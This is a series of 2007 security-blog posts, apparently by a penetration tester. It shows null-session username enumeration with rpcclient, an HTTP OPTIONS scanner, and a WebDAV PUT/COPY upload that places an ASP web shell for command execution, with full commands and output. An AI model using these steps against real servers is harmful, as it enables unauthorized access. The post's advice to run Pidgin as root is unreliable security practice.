Wednesday, August 29, 2007

More of using rpcclient to find usernames


So say you are given the assignment of doing an audit in a non-English-speaking country. At a minimum you are going to have to find out how they spell "administrator" in the country in question. If Google doesn't help you, or gives you multiple options (like it did me this time), and you can find a box running Samba or with File and Printer Sharing enabled and shared to the world (like you aren't supposed to do), then you can use rpcclient to pull out the usernames with a null session.

null sessions still rule in 2007...

cg@segfault:~$ rpcclient -U "" x.x.3.96
Password:
rpcclient $> lsaenumsid
found 11 SIDs
S-1-5-6
S-1-5-32-551
S-1-5-32-547
S-1-5-32-545
S-1-5-32-544
S-1-5-21-2000478354-1708537768-1957994488-501 <--guest
S-1-5-21-2000478354-1708537768-1957994488-500 <--administrator
S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-1-0
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-501
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\Convidado (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
rpcclient $> lookupnames Administrador
Administrador S-1-5-21-2000478354-1708537768-1957994488-500 (User: 1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-504
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-505
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-506
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\TsInternetUser (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1001 NSL09\IUSR_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1002 NSL09\IWAM_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1003
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> exit


There you have it:

rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)

Oh, and thanks for the name of the box too :-)
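As an added example (my code, not part of the original post), here is a small Python parser for rpcclient lookupsids output like the session above. It pairs each lookupsids command with the line that answers it and maps the fixed RIDs 500 and 501 to their roles, so whoever is writing up what a null session exposes can identify the localized Administrator and Guest accounts by RID rather than by spelling. The sample session is a constructed, trimmed copy of the transcript above; the regexes and function names are my own.

```python
import re

# Constructed sample: a trimmed copy of the rpcclient session above.
SAMPLE_SESSION = """\
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-501
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\\Convidado (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\\Administrador (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\\TsInternetUser (1)
"""

# RIDs that Windows fixes regardless of the account's (localized) display name.
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}
# SID_NAME_USE codes that rpcclient prints in parentheses after the name.
SID_TYPES = {1: "user", 2: "group", 4: "alias", 5: "well-known group"}

CMD_RE = re.compile(r"^rpcclient \$> lookupsids (S-1-5-21-\d+-\d+-\d+)-(\d+)$")
HIT_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+) ([^\\]+)\\(\S+) \((\d+)\)$")

def parse_session(text: str) -> list:
    """Pair each lookupsids command with the line that answers it."""
    rows, pending = [], None
    for line in text.splitlines():
        cmd = CMD_RE.match(line)
        if cmd:
            pending = (cmd.group(1), int(cmd.group(2)))
            continue
        hit = HIT_RE.match(line)
        if hit:
            rid = int(hit.group(2))
            rows.append({"domain_sid": hit.group(1), "rid": rid,
                         "domain": hit.group(3), "name": hit.group(4),
                         "type": SID_TYPES.get(int(hit.group(5)), "unknown"),
                         "role": WELL_KNOWN_RIDS.get(rid)})
            pending = None
        elif line.startswith("result was NT_STATUS_NONE_MAPPED") and pending:
            # The RID was probed but no account on the box uses it.
            rows.append({"domain_sid": pending[0], "rid": pending[1],
                         "domain": None, "name": None, "type": "unmapped",
                         "role": WELL_KNOWN_RIDS.get(pending[1])})
            pending = None
    return rows

def localized_names(text: str) -> dict:
    """Role -> name the target actually uses, e.g. 'Administrador' for RID 500."""
    return {r["role"]: r["name"] for r in parse_session(text)
            if r["role"] and r["name"]}
```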


Fun rpcclient info: http://uw714doc.sco.com/en/samba/rpcclient.1.html

-CG

Nmap's ircServerInfo script


dean de beer

Sunday, August 26, 2007

BackTrack2 is NOT an operating system!!!


OK, over on EH.net there are a couple of running threads on installing BackTrack to hard disk/drive so people can use BackTrack2 as their operating system.

Here is one of them: link; I don't feel like looking up the rest (really not the point), but this has been going on for some time now (really since BT1).

OK, I am going to vent for just a sec, but I do have a point...

BACKTRACK IS NOT AN OPERATING SYSTEM! it is a TOOL!!

Yes, obviously you can run it as an operating system (hence the whole point of the rant), but why do you NEED to do that?

Frankly, the best education comes from building your own attack platform on the Linux distro you installed, configured, and hardened yourself. You install, configure and mess with the tools YOU need to do your pentesting (or scanning your local ISP subnet) and don't have a bunch of extra crap you don't need. You get to work through library issues and crap breaking and getting so pissed at your box that you want to dropkick it out the window, but guess what, you LEARN doing all that.

One of the biggest things I see over at LSO and during the rootwars is people having weak Linux skills and not being able to compile and use their own tools, so naturally we ask what distro they run, and most of the time I get BackTrack for an answer :-(

Don't get me wrong, I like BackTrack2 as a TOOL: I boot the ISO in VMware, I do what I need to do, then I go back to my Linux distro to read email and everything else. I have a couple of personal reasons for that, one of them being deniability with the non-persistent option :-) but mostly for the reasons above; if I am going to go through the trouble of installing a distro I might as well get something out of the install (Linux knowledge-wise) instead of letting someone else do all the work for me.

Just my thoughts on it. Spend that effort installing that great set of tools that BackTrack comes with on your own; you'll learn more, you'll really get an idea of whether you actually NEED all of those tools, and you get the satisfaction of having control over your Linux install.

-CG

Thursday, August 23, 2007

Should I be flattered or worried...


So I was playing on my LinkedIn account and checked the "who has viewed your profile" option. One category caught my eye. Not sure if I should be flattered or worried that someone from the Ministry of Defense is taking a looksee...


CG

Sunday, August 19, 2007

Creating a HTTP OPTIONS auxiliary module for Metasploit


Inspired by HD's HTTP version auxiliary module, I wanted to see if I could get one going that would pull down the HTTP verbs allowed on a web server.

Basically I wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private

cg@segfault:~/evil/msf3$

but with a Metasploit auxiliary module. So I got it going... mostly HD's module, but I changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

I'll post the code on carnal0wnage when I get off my butt, plus a little something something that gives you a status if you are scanning a Class C.
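An added example, written for this page and not the module from the post or HD's code: Python that parses an OPTIONS response like the IIS reply above, lists the advertised methods, and flags the ones that let an anonymous client write, rename or delete content (plus TRACE), which is the check you would run against your own IIS/WebDAV servers before anyone else does. The sample response is constructed from the headers shown above; fetch_options() is a hypothetical helper that uses only the standard library.

```python
import http.client

# Constructed sample: the IIS 6.0 reply shown above, as it arrives off the wire.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Connection: close\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "DAV: 1,2\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Content-Length: 0\r\n\r\n"
)

# Methods that let an anonymous client write, rename or delete content, or
# that echo requests back (TRACE); a public web server should not offer them.
RISKY = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK", "TRACE"}

def parse_headers(raw: str) -> dict:
    # Keep only the header block; header names are case-insensitive.
    head = raw.split("\r\n\r\n", 1)[0]
    _status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return headers

def allowed_methods(headers: dict) -> list:
    # Prefer Allow; IIS also sends a Public header, so fall back to it.
    value = headers.get("allow") or headers.get("public") or ""
    return sorted({m.strip().upper() for m in value.split(",") if m.strip()})

def assess(raw: str) -> tuple:
    """Return (all methods, risky methods, whether WebDAV is advertised)."""
    headers = parse_headers(raw)
    methods = allowed_methods(headers)
    risky = sorted(set(methods) & RISKY)
    return methods, risky, "dav" in headers

def fetch_options(host: str, port: int = 80, timeout: float = 5.0) -> str:
    """Hypothetical helper: send OPTIONS * to a server you run, return raw headers."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("OPTIONS", "*")
    resp = conn.getresponse()
    lines = [f"HTTP/1.1 {resp.status} {resp.reason}"] + [f"{k}: {v}" for k, v in resp.getheaders()]
    conn.close()
    return "\r\n".join(lines) + "\r\n\r\n"
```

Run `assess(fetch_options("yourhost"))` against a server you administer; a non-empty risky list means the write methods the post goes on to use are reachable without credentials.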

**More on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

Then you have to do a MOVE or COPY request. Personally I was having issues getting a MOVE request to work with a netcat connection, so I used...

**UPDATE
It ended up being the carriage returns (or lack thereof) that were causing me to get a 400 Bad Request error. I couldn't get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

From there you will want to upload your cmd.asp so you can execute commands on the box.

(Screenshot: browsing to upload.asp and uploading our cmd.asp (cmdx.aspx))

(Screenshot: interacting with our cmdx.aspx to list the directory contents of the C drive)

-CG

Sunday, August 12, 2007

Getting the SILC plugin to work with pidgin on ubuntu 7.04


Maybe it's common knowledge to everyone else, but since I couldn't find a good answer with Google I'll post up how I got the SILC plugin and GoogleTalk to work with Pidgin on Ubuntu 7.04.

First, Ubuntu has some stupid-ass permissions on a lot of stuff and you have to use sudo for everything. I'm still undecided if Ubuntu is staying around, but this can even cause you to be unable to read files and folders that you own (like I said, stupid).

Well, when you start up Pidgin as your user account everything works pretty well, except when you try to run your SILC module. You'll probably get a "can't create silc key pair" error. Googling won't do you much good, and you'll look where it tells you the keys are (/home/$userid/.silc/public_key.pub & private_key.prv) and you won't have any keys there. Copying keys over from another SILC client won't work.

So the fix is to run Pidgin as root so it will generate the keys for you.

cg@segfault:~$ sudo pidgin
Password:
Public key has been saved into `/root/.silc/public_key.pub'.
Private key has been saved into `/root/.silc/private_key.prv'.


After that, copy those new spiffy keys from /root/ to your home directory:

cg@segfault:~$ sudo su
root@segfault:/home/cg# cp /root/.silc/public_key.pub /home/cg/.silc/
root@segfault:/home/cg# cp /root/.silc/private_key.prv /home/cg/.silc/


Things should work after that.

I also had issues with SSL support; Google actually helped out this time and I found

http://developer.pidgin.im/wiki/FAQssl

You need to compile with the libgnutls package:


sudo apt-get install libgnutls-dev

Then recompile from source:

./configure --enable-gnutls

MSN and GoogleTalk should work after that.

CG

Wednesday, August 8, 2007

Playing with Kismet


A few people know I am recovering from my iBook dying.

Of course, like a jackass, I wasn't backing up properly, which is kind of a bummer, but sometimes it's nice to start fresh. If any of you ever sent me an email I wanted to keep, can you please resend it :-)

Anyway, the silver lining of all of this is I got a new lappy (Toshiba A135-S4727) with a built-in Atheros card, so I can finally use that Hacking Exposed Wireless book I borrowed from work (and won't be returning) and can play with some of the wireless hacking tools. I'm running Ubuntu 7.04 so it was fairly easy to get things up and running. A couple of quick apt-gets and a little editing of the kismet conf file and I was up and running.

$sudo apt-get install madwifi-tools
$sudo apt-get install kismet


After you install the madwifi tools you should see the wifi0 interface when you do an ifconfig:

wifi0 Link encap:UNSPEC HWaddr 00-19-7E-8A-BB-F4-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1399800 errors:113005 dropped:98619 overruns:0 frame:1332679
TX packets:98112 errors:2 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:199
RX bytes:283152996 (270.0 MiB) TX bytes:12557358 (11.9 MiB)
Interrupt:16


Change directories into /etc/kismet and edit the kismet.conf file to use the madwifi_ag driver:

source=madwifi_ag,wifi0,Atheros

After that you should be good to go:

$sudo kismet

Links

http://www.kismetwireless.net/
http://www.wi-fiplanet.com/tutorials/article.php/3595531
CG